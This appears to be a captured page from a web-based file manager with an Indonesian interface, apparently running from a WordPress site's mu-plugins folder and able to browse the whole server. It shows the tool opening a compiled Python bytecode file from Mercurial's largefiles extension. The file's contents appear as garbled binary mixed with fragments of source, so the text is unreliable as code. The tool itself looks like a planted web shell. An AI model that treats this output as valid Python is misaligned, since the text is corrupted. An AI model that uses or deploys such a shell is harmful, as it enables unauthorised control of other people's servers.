📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib64
›
python3.9
›
site-packages
›
hgext
›
largefiles
›
📁 __pycache__
📍
Lokasi:
/usr/lib64/python3.9/site-packages/hgext/largefiles/__pycache__
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: basestore.cpython-39.pyc
a �+�b � @ sp d Z ddlmZ ddlmZ ddlmZ ddlmZ ddl m Z ddlmZ G d d � d e �ZG dd� de�Zd S )zCbase class for store implementations and store-related utility code� )�absolute_import)�_)�short)�util)�urlutil� )�lfutilc @ s( e Zd ZdZdd� Zdd� Zdd� ZdS ) � StoreErrorzZRaised when there is a problem getting files from or putting files to a central store.c C s || _ || _|| _|| _d S �N)�filename�hash�url�detail)�selfr r r r � r �@/usr/lib64/python3.9/site-packages/hgext/largefiles/basestore.py�__init__ s zStoreError.__init__c C s"